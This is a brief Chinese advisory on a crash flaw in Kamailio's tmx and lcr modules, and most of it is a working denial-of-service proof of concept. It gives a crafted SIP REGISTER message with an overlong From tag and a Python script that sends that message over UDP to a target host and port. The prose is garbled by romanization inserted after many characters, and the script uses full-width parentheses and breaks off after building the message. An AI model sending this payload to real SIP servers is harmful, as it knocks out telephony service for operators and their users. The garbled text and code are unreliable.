　　kamailio 版本4.4.5.0 和5.1模塊爆安全問(wèn)題，tmx模塊和lcr模塊可能收到影響。攻擊者可根據(jù)模塊漏洞通過(guò)tag 方式使用非法的branch或from tag對(duì)kamailio進(jìn)行攻擊，可導(dǎo)致kamalio崩潰。tmx 模塊負(fù)責(zé)對(duì)transaction management 進(jìn)行管理，LCR則負(fù)責(zé)是一個(gè)最低資費(fèi)路由模塊。如果用戶沒(méi)有使用以上兩個(gè)模塊，則無(wú)影響，如果使用了以上兩個(gè)模塊，官方建議盡快升級(jí)到最新版本。

　　以下是通過(guò)SIP tag 攻擊kamailio導(dǎo)致軟交換崩潰的消息：

REGISTER sip:localhost:5060 SIP/2.0
Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394
To: <sip:1@localhost:5060>
From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg
Call-ID: 8b113457-c6a6-456a-be68-606686d93c38
Contact: sip:1@127.0.0.1:53497
Max-Forwards: 70
CSeq: 10086 REGISTER
User-Agent: go SIP fuzzer/1
Content-Length: 0

　　使用的Python 代碼攻擊方式如下，

　　python crash.py <ip> <port>

　　#!/usr/bin/env python

　　import socket

　　import sys

　　PROTO = "udp"

　　SERVER_IP = "127.0.0.1"

　　SERVER_PORT = 5060

　　for _ in range（2）:

sock = socket.socket（socket.AF_INET, socket.SOCK_DGRAM）
sock.connect（（sys.argv[1], int（sys.argv[2]）））
msg = "REGISTER sip:localhost:5060 SIP/2.0\r\n" \
"Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394\r\n" \
"To: <sip:1@localhost:5060>\r\n" \
"From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg\r\n" \
"Call-ID: 8b113457-c6a6-456a-be68-606686d93c38\r\n" \
"Contact: sip:1@127.0.0.1:53497\r\n" \
"Max-Forwards: 70\r\n" \
"CSeq: 10086 REGISTER\r\n" \
"User-Agent: go SIP fuzzer/1\r\n" \
"Content-Length: 0\r\n" \
"\r\n"